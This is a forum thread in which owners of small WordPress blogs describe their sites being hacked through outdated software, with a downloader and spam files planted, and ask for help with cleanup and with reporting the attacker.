I was at school and I was showing a teacher how nice my sisters art blog was. This ia a blog her students go to. Someone hacked in and installed a downloader and I went into the ftp and there is a file called (1) next to my (uploads) folder with all kinds of poker.html and such in it. I did not put it there. This is so criminal. We spent alot of time on this site just to have some thief ruin it. I don't know how to remove it. Can someone help me.
although I don't advice you going there unless you have updated virus protection the site is http://www.la-art-tutor.com I deleted that (1) folder that was in my contents folder but Norton says its still blocking a downloader.

Along with site ownership comes some amount of responsibility. Your sister was using an old, outdated and very UNSECURE version of WP. This is why her site was hacked.

This is a snipett of the code that was placed in a post. can I use the url and IP to turn in this criminal. I wish there was a way to make people go to prison for this kind of crime.

I'm afraid my site was also hacked. The URL of my site is mentioned above (stuartmcvicar.net) however I have no knowledge of the afore mentioned files in the "/1/" folder.
Due to a lack of activity with my blog I neglected to upgrade the version of WordPress I was using and my site was hacked.
I have removed my blog from StuartMcVicar.net and I have created a holding page (www.stuartmcvicar.com) which I will point my url to.
Apologies for any harm caused, I was also a victim of a hacker and should have kept my version of WordPress up to date.
